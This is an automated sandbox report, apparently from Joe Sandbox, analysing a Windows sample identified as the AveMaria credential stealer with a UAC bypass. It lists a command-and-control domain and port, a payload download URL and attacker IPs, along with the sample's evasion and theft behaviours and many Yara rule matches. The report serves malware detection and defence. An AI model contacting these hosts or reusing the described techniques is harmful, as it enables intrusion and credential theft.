Windows Analysis Report hesaphareketi-01.exe

Overview

General Information

Sample Name: hesaphareketi-01.exe
Analysis ID: 502776
MD5: 38e162610466dd251d9b377a60f65c11
SHA1: 2a597d5198230eaafe8d842e76776192ba3e6742
SHA256: 7eb784edddde0eddd7b21c4907916f0109334a4237a9c2eb917caf8eae81480f
Tags: exe geo TUR

Detection

AveMaria UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • hesaphareketi-01.exe (PID: 1700 cmdline: 'C:\Users\user\Desktop\hesaphareketi-01.exe' MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 6464 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 5380 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 6512 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "atifgabuying.ddns.net", "port": 7681}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x2c98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x5aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2c98:$c1: Elevation:Administrator!new:
  • 0x5aa0:$c1: Elevation:Administrator!new:
00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xc98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xc98:$c1: Elevation:Administrator!new:
  • 0x3aa0:$c1: Elevation:Administrator!new:
00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xc98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xc98:$c1: Elevation:Administrator!new:
  • 0x3aa0:$c1: Elevation:Administrator!new:

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
      • 0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
      • 0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x2318:$c1: Elevation:Administrator!new:
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
      17.2.hesaphareketi-01.exe.400000.0.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
      • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      17.2.hesaphareketi-01.exe.400000.0.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
      • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x191f0:$c1: Elevation:Administrator!new:

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, Malware Configuration Extractor: AveMaria {"C2 url": "atifgabuying.ddns.net", "port": 7681}
        Multi AV Scanner detection for submitted file
        Source: hesaphareketi-01.exe, Virustotal: Detection: 31%
        Yara detected AveMaria stealer
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe, Virustotal: Detection: 31%
        Machine Learning detection for sample
        Source: hesaphareketi-01.exe, Joe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe, Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe, Joe Sandbox ML: detected
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, Avira: Label: TR/Redcap.ghjpt

        Exploits:

        Yara detected UACMe UAC Bypass tool
        Source: hesaphareketi-01.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
        Source: unknown, HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe, Directory created: C:\Program Files\Microsoft DN1
        Source: hesaphareketi-01.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmp

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: atifgabuying.ddns.net
        Uses dynamic DNS services
        Source: unknown, DNS query: name: atifgabuying.ddns.net
        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global traffic, HTTP traffic detected: GET /download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll HTTP/1.1 Host: store2.gofile.io Connection: Keep-Alive
        Source: Joe Sandbox View, IP Address: 31.14.69.10
        Source: global traffic, TCP traffic: 192.168.2.5:49784 -> 185.66.91.154:7681
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknown, Network traffic detected: HTTP traffic on port 49762 -> 443
        Source: hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: hesaphareketi-01.exe, String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
        Source: hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmp, String found in binary or memory: https://store2.gofile.io
        Source: hesaphareketi-01.exe, String found in binary or memory: https://store2.gofile.io/download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll
        Source: unknown, DNS traffic detected: queries for: store2.gofile.io
        Source: unknown, HTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, Binary or memory string: GetRawInputData

        E-Banking Fraud:

        Yara detected AveMaria stealer

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: hesaphareketi-01.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
        Source: 17.3.hesaphareketi-01.exe.eca788.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
